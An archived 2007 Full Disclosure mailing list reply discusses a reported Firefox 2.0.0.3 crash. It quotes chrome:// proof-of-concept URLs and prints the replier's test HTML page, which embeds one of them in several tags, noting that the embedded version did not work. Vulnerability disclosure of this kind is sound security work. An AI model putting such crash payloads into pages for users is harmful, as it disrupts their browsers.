Full Disclosure mailing list archives
Re: Firefox 2.0.0.3 DoS crash
From: Tõnu Samuel <tonu () jes ee>
Date: Fri, 20 Apr 2007 19:25:30 +0300
On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:
Firefox 2.0.0.3 DoS crash PoC: chrome://pippki/content/editcacert.xul chrome://pippki/content/editemailcert.xul chrome://pippki/content/editsslcert.xul
Works for me on Linux when clicking on such link. Meanwhile I tried to embed it into webpage and did not work. tonu@duo:~/Desktop> cat poc.html <html> <body> <img src="chrome://pippki/content/editcacert.xul" /> <iframe src="chrome://pippki/content/editcacert.xul" ></iframe> <object src="chrome://pippki/content/editcacert.xul" type="text/html"></object> <script src="chrome://pippki/content/editcacert.xul" ></script> </body> </html> tonu@duo:~/Desktop> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Firefox 2.0.0.3 DoS crash carl hardwick (Apr 19)
- Re: Firefox 2.0.0.3 DoS crash Tõnu Samuel (Apr 20)
- Re: Firefox 2.0.0.3 DoS crash ascii (Apr 20)